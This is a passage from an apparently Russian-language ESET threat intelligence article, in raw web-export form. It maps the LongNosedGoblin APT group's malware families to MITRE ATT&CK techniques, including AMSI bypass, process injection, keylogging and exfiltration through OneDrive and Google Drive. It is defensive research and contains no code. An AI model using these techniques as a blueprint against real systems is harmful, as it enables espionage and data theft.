width=\"151\"><strong>\u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435<\/strong><\/td>\n<td width=\"265\"><strong>\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td rowspan=\"2\" width=\"113\"><strong>\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0430 \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1585\/003\/\">T1585.003<\/a><\/td>\n<td width=\"151\">\u0421\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439: \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0435 \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438<\/td>\n<td width=\"265\">LongNosedGoblin \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u043b \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 \u0432 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u0430\u0445 \u0434\u043b\u044f \u0441\u0432\u044f\u0437\u0438 C&amp;C.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1588\/001\/\">T1588.001<\/a><\/td>\n<td width=\"151\">\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0435\u0439: \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e<\/td>\n<td width=\"265\">LongNosedGoblin, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b \u043e\u0431\u0449\u0435\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043c\u044b \u043d\u0430\u0437\u0432\u0430\u043b\u0438 NosyDoor.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\" width=\"113\"><strong>\u0412\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1059\/001\">T1059.001<\/a><\/td>\n<td width=\"151\">\u0418\u043d\u0442\u0435\u0440\u043f\u0440\u0435\u0442\u0430\u0442\u043e\u0440 \u043a\u043e\u043c\u0430\u043d\u0434 \u0438 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432: PowerShell<\/td>\n<td width=\"265\">NosyDownloader \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u044b PowerShell.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1059\/003\">T1059.003<\/a><\/td>\n<td width=\"151\">\u0418\u043d\u0442\u0435\u0440\u043f\u0440\u0435\u0442\u0430\u0442\u043e\u0440 \u043a\u043e\u043c\u0430\u043d\u0434 \u0438 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432: \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u0430\u044f \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0430 Windows<\/td>\n<td width=\"265\">NosyDoor \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0447\u0435\u0440\u0435\u0437 <sub>cmd.exe<\/sub>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1106\/\">T1106<\/a><\/td>\n<td width=\"113\">Native API<\/td>\n<td width=\"265\">NosyStealer Stage 1 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u044d\u0442\u0430\u043f \u0447\u0435\u0440\u0435\u0437 API <span>LoadLibraryW<\/span>.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\" width=\"113\"><strong>\u0421\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u0435<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1053\/005\">T1053.005<\/a><\/td>\n<td width=\"151\">\u041f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0449\u0438\u043a \u0437\u0430\u0434\u0430\u0447\/\u0437\u0430\u0434\u0430\u043d\u0438\u0435: \u041f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0449\u0438\u043a \u0437\u0430\u0434\u0430\u0447<\/td>\n<td width=\"265\">NosyDoor \u0438 NosyStealer \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u044e\u0442\u0441\u044f \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0437\u0430\u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0437\u0430\u0434\u0430\u0447 Windows.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1574\/014\">T1574.014<\/a><\/td>\n<td width=\"151\">\u041f\u0435\u0440\u0435\u0445\u0432\u0430\u0442 \u043f\u043e\u0442\u043e\u043a\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f: AppDomainManager<\/td>\n<td width=\"265\">NosyDoor Stage 2 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u044e AppDomainManager \u0434\u043b\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"10\" width=\"113\"><strong>\u041e\u0431\u0445\u043e\u0434 \u0437\u0430\u0449\u0438\u0442\u044b<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1027\/013\/\">T1027.013<\/a><\/td>\n<td width=\"151\">\u041e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u044f \u0444\u0430\u0439\u043b\u043e\u0432 \u0438\u043b\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438: \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439\/\u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b<\/td>\n<td width=\"265\">\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b, \u0432\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u0435 \u0432 NosyDoor Stage 1, \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u044b \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e DES.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1027\/015\/\">T1027.015<\/a><\/td>\n<td width=\"151\">\u041e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u044f \u0444\u0430\u0439\u043b\u043e\u0432 \u0438\u043b\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438: \u0441\u0436\u0430\u0442\u0438\u0435<\/td>\n<td width=\"265\">NosyDownloader Stage 4 \u0441\u0436\u0430\u0442 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c gzip.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1622\">T1622<\/a><\/td>\n<td width=\"151\">\u041e\u0431\u0445\u043e\u0434 \u043e\u0442\u043b\u0430\u0434\u0447\u0438\u043a\u0430<\/td>\n<td width=\"265\">NosyLogger \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442, \u0435\u0441\u043b\u0438 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u043e\u0442\u043b\u0430\u0434\u0447\u0438\u043a.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1480\">T1480<\/a><\/td>\n<td width=\"151\">\u041e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f<\/td>\n<td width=\"265\">\u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0431\u0440\u0430\u0437\u0446\u044b NosyDoor \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0430\u0445 \u0441 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u043c\u0438 \u0438\u043c\u0435\u043d\u0430\u043c\u0438.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1564\/003\">T1564.003<\/a><\/td>\n<td width=\"151\">\u0421\u043a\u0440\u044b\u0442\u0438\u0435 \u0430\u0440\u0442\u0435\u0444\u0430\u043a\u0442\u043e\u0432: \u0441\u043a\u0440\u044b\u0442\u043e\u0435 \u043e\u043a\u043d\u043e<\/td>\n<td width=\"265\">NosyDownloader \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 PowerShell \u0441\u043e \u0441\u043a\u0440\u044b\u0442\u044b\u043c \u043e\u043a\u043d\u043e\u043c.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1562\/001\">T1562.001<\/a><\/td>\n<td width=\"151\">\u041d\u0430\u0440\u0443\u0448\u0435\u043d\u0438\u0435 \u0437\u0430\u0449\u0438\u0442\u044b: \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u0438\u043b\u0438 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432<\/td>\n<td width=\"265\">NosyDoor Stage 2, NosyStealer Stage 3 \u0438 NosyDownloader \u043e\u0431\u0445\u043e\u0434\u044f\u0442 AMSI.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1036\/005\">T1036.005<\/a><\/td>\n<td width=\"151\">\u041c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u043a\u0430: \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0438\u043c\u0435\u043d\u0438 \u0438\u043b\u0438 \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0437\u0430\u043a\u043e\u043d\u043d\u043e\u0433\u043e \u041f\u041e<\/td>\n<td width=\"265\">NosyHistorian Stage 1 \u0431\u044b\u043b \u0437\u0430\u043c\u0435\u0447\u0435\u043d \u043f\u043e\u0434 \u0438\u043c\u0435\u043d\u0435\u043c <span>Registry.pol<\/span>, \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u044f\u0441\u044c \u043f\u043e\u0434 \u0444\u0430\u0439\u043b \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0438 \u0440\u0435\u0435\u0441\u0442\u0440\u0430.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1218\">T1218<\/a><\/td>\n<td width=\"151\">\u0412\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0447\u0435\u0440\u0435\u0437 \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0435 \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b<\/td>\n<td width=\"265\">NosyDoor Stage 1 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u044d\u0442\u0430\u043f, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0437\u0430\u043a\u043e\u043d\u043d\u044b\u0439 <span>UevAppMonitor.exe<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1055\">T1055<\/a><\/td>\n<td width=\"151\">\u0418\u043d\u044a\u0435\u043a\u0446\u0438\u044f \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430<\/td>\n<td width=\"265\">\u041e\u0434\u0438\u043d \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c\u044b\u0439 NosyStealer Stage 2 \u0432\u043d\u0435\u0434\u0440\u044f\u0435\u0442 Stage 3 \u0432 <span>pmp.exe<\/span> \u0447\u0435\u0440\u0435\u0437 <span>CreateRemoteThread<\/span>. \u0414\u0440\u0443\u0433\u043e\u0439 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c\u044b\u0439 \u043e\u0431\u0440\u0430\u0437\u0435\u0446 \u0432\u043d\u0435\u0434\u0440\u044f\u0435\u0442 \u0432 <span>notepad.exe<\/span> \u0447\u0435\u0440\u0435\u0437 <span>SetThreadContext<\/span> \u0441 <span>ResumeThread<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1620\">T1620<\/a><\/td>\n<td width=\"151\">\u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0440\u0435\u0444\u043b\u0435\u043a\u0441\u0438\u0432\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430<\/td>\n<td width=\"265\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/software\/S0695\/\">Donut<\/a> \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f NosyStealer Stage 3 \u0438 Stage 4 \u0432 \u043f\u0430\u043c\u044f\u0442\u0438.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\" width=\"113\"><strong>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1217\">T1217<\/a><\/td>\n<td width=\"151\">\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430<\/td>\n<td width=\"265\">NosyHistorian \u0441\u043e\u0431\u0438\u0440\u0430\u0435\u0442 \u0438\u0441\u0442\u043e\u0440\u0438\u044e \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430 \u0438\u0437 Google Chrome, Microsoft Edge \u0438 Mozilla Firefox.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1083\">T1083<\/a><\/td>\n<td width=\"151\">\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0444\u0430\u0439\u043b\u043e\u0432 \u0438 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u0432<\/td>\n<td width=\"265\">NosyDoor \u043c\u043e\u0436\u0435\u0442 \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u044f\u0442\u044c \u0444\u0430\u0439\u043b\u044b \u0438 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0438.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1082\">T1082<\/a><\/td>\n<td width=\"151\">\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438<\/td>\n<td width=\"265\">NosyDoor \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043a\u0430\u043a \u0447\u0430\u0441\u0442\u044c \u043c\u0430\u044f\u043a\u0430 C&amp;C.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"4\" width=\"113\"><strong>\u0421\u0431\u043e\u0440<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1056\/001\">T1056.001<\/a><\/td>\n<td width=\"151\">\u0417\u0430\u0445\u0432\u0430\u0442 \u0432\u0432\u043e\u0434\u0430: \u043a\u0435\u0439\u043b\u043e\u0433\u0433\u0438\u043d\u0433<\/td>\n<td width=\"265\">NosyLogger \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u0442 \u043d\u0430\u0436\u0430\u0442\u0438\u044f \u043a\u043b\u0430\u0432\u0438\u0448.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1125\">T1125<\/a><\/td>\n<td width=\"151\">\u0417\u0430\u0445\u0432\u0430\u0442 \u0432\u0438\u0434\u0435\u043e<\/td>\n<td width=\"265\">LongNosedGoblin \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0435 \u0434\u043b\u044f \u0437\u0430\u043f\u0438\u0441\u0438 \u0432\u0438\u0434\u0435\u043e, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, FFmpeg, \u0434\u043b\u044f \u0437\u0430\u0445\u0432\u0430\u0442\u0430 \u0430\u0443\u0434\u0438\u043e \u0438 \u0432\u0438\u0434\u0435\u043e.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1560\/\">T1560<\/a><\/td>\n<td width=\"151\">\u0410\u0440\u0445\u0438\u0432\u0430\u0446\u0438\u044f \u0441\u043e\u0431\u0440\u0430\u043d\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445<\/td>\n<td width=\"265\">NosyLogger \u0448\u0438\u0444\u0440\u0443\u0435\u0442 \u0441\u043e\u0431\u0440\u0430\u043d\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e AES.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1074\/001\/\">T1074.001<\/a><\/td>\n<td width=\"151\">\u042d\u0442\u0430\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0434\u0430\u043d\u043d\u044b\u0445: \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0435 \u044d\u0442\u0430\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0434\u0430\u043d\u043d\u044b\u0445<\/td>\n<td width=\"265\">NosyLogger \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u0442 \u043d\u0430\u0436\u0430\u0442\u044b\u0435 \u043a\u043b\u0430\u0432\u0438\u0448\u0438, \u0438\u043c\u0435\u043d\u0430 \u043e\u043a\u043e\u043d \u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0431\u0443\u0444\u0435\u0440\u0430 \u043e\u0431\u043c\u0435\u043d\u0430 \u0432 \u0444\u0430\u0439\u043b\u0435 \u043f\u043e \u0436\u0435\u0441\u0442\u043a\u043e \u0437\u0430\u0434\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u0443\u0442\u0438.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"5\" width=\"113\"><strong>\u041a\u043e\u043c\u0430\u043d\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1071\/001\">T1071.001<\/a><\/td>\n<td width=\"151\">\u041f\u0440\u043e\u0442\u043e\u043a\u043e\u043b \u043f\u0440\u0438\u043a\u043b\u0430\u0434\u043d\u043e\u0433\u043e \u0443\u0440\u043e\u0432\u043d\u044f: \u0432\u0435\u0431-\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u044b<\/td>\n<td width=\"265\">NosyDownloader \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 HTTP \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1105\/\">T1105<\/a><\/td>\n<td width=\"151\">\u041f\u0435\u0440\u0435\u0434\u0430\u0447\u0430 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0447\u0435\u0440\u0435\u0437 \u0441\u0435\u0442\u044c<\/td>\n<td width=\"265\">NosyDoor \u0438 NosyDownloader \u043c\u043e\u0433\u0443\u0442 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0435 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1102\/002\">T1102.002<\/a><\/td>\n<td width=\"151\">\u0412\u0435\u0431-\u0441\u0435\u0440\u0432\u0438\u0441: \u0434\u0432\u0443\u0441\u0442\u043e\u0440\u043e\u043d\u043d\u044f\u044f \u0441\u0432\u044f\u0437\u044c<\/td>\n<td width=\"265\">NosyDoor \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 Microsoft OneDrive \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 C&amp;C. NosyStealer \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 Google Docs \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b-\u0442\u0440\u0438\u0433\u0433\u0435\u0440\u0430 \u0438 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u043e\u0442\u043b\u0430\u0434\u043e\u0447\u043d\u044b\u0445 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439, \u0430 Google Drive \u2014 \u0434\u043b\u044f \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1573\/001\/\">T1573.001<\/a><\/td>\n<td width=\"151\">\u0417\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043a\u0430\u043d\u0430\u043b: \u0441\u0438\u043c\u043c\u0435\u0442\u0440\u0438\u0447\u043d\u0430\u044f \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u044f<\/td>\n<td width=\"265\">NosyDoor \u0448\u0438\u0444\u0440\u0443\u0435\u0442 \u0432\u044b\u0445\u043e\u0434\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434 C&amp;C \u0447\u0435\u0440\u0435\u0437 AES.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1573\/002\/\">T1573.002<\/a><\/td>\n<td width=\"151\">\u0417\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043a\u0430\u043d\u0430\u043b: \u0430\u0441\u0438\u043c\u043c\u0435\u0442\u0440\u0438\u0447\u043d\u0430\u044f \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u044f<\/td>\n<td width=\"265\">NosyDoor \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 RSA \u0434\u043b\u044f \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0445, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0445 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440 C&amp;C.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>\u042d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u044f<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1567\/002\">T1567.002<\/a><\/td>\n<td width=\"151\">\u042d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u044f \u0447\u0435\u0440\u0435\u0437 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0438\u0441: \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u044f \u0432 \u043e\u0431\u043b\u0430\u0447\u043d\u043e\u0435 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0435<\/td>\n<td width=\"265\">NosyStealer \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0443\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430 \u0432 Google Drive.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan&amp;sfdccampaignid=7011n0000017htTAAQ\"><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"296\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/eti-eset-threat-intelligence.png\" width=\"915\"><\/a><\/p>\n<p class=\"wls-source\"><a href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan\/\" rel=\"nofollow noopener\" target=\"_blank\">\u0427\u0438\u0442\u0430\u0442\u044c \u043f\u043e\u043b\u043d\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u043d\u0430 WeLiveSecurity \u2192<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 ESET \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0443\u044e \u0441 \u041a\u0438\u0442\u0430\u0435\u043c APT-\u0433\u0440\u0443\u043f\u043f\u0443 LongNosedGoblin, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0433\u0440\u0443\u043f\u043f\u043e\u0432\u0443\u044e \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0443 \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f 